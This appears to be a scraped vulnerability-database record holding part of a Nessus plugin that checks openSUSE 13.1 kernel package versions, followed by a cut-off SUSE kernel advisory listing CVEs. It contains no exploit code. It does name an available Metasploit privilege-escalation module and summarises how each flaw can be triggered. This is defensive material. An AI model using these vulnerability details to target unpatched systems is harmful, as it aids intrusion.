support Add SPI bus support Add user-space access to I2C\n and SPI\n\n -\n patches.arch/iommu-vt-d-remove-stack-trace-from-broken-i\n rq-remapping-warning.patch: Fix forward porting, sorry.\n\n - iommu: Remove stack trace from broken irq remapping\n warning (bnc#844513).\n\n - gpio: ucb1400: Add MODULE_ALIAS.\n\n - Allow NFSv4 username mapping to work properly\n (bnc#838024).\n\n - nfs: check if gssd is running before attempting to use\n krb5i auth in SETCLIENTID call.\n\n - sunrpc: replace sunrpc_net->gssd_running flag with a\n more reliable check.\n\n - sunrpc: create a new dummy pipe for gssd to hold open.\n\n - Set CONFIG_GPIO_TWL4030 as built-in (instead of module)\n as a requirement to boot on SD card on beagleboard xM\n\n - armv6hl, armv7hl: Update config files. Set\n CONFIG_BATMAN_ADV_BLA=y as all other kernel\n configuration files have.\n\n - Update config files :\n\n - CONFIG_BATMAN_ADV_NC=y, because other BATMAN_ADV options\n are all enabled so why not this one.\n\n - CONFIG_GPIO_SCH=m, CONFIG_GPIO_PCH=m, because we support\n all other features of these pieces of hardware.\n\n - CONFIG_INTEL_POWERCLAMP=m, because this small driver\n might be useful in specific cases, and there's no\n obvious reason not to include it.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range()\n calls (bnc#849021, CVE-2013-4511).\n\n - Linux 3.11.7.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=773058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=838024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=844513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=845621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=846529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=848042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=850072\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852931\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=854175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=854722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=856294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=859804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=860993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-02/msg00022.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-default-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-source-vanilla-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"kernel-syms-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.11.10-7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.11.10-7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:36:09", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-16939: The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages. (bnc#1069702)\n\n - CVE-2017-1000405: mm, thp: do not dirty huge pages on read fault (bnc#1069496).\n\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. (bnc#1067085)\n\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c, when CONFIG_X86_X32 is enabled, allowed local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter (bnc#860993).\n\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel allowed local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. (bnc#1067086)\n\n - CVE-2017-16535: The usb_get_bos_descriptor function in drivers/usb/core/config.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. (bnc#1066700)\n\n - CVE-2017-15102: The tower_probe function in drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users (who are physically proximate for inserting a crafted USB device) to gain privileges by leveraging a write-what-where condition that occurs after a race condition and a NULL pointer dereference.\n (bnc#1066705)\n\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.\n (bnc#1066671)\n\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel mishandled node splitting, which allowed local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations.\n (bnc#1066192)\n\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c in the Linux kernel allowed local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. (bnc#1066650)\n\n - CVE-2017-16525: The usb_serial_console_disconnect function in drivers/usb/serial/console.c in the Linux kernel allowed local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device, related to disconnection and 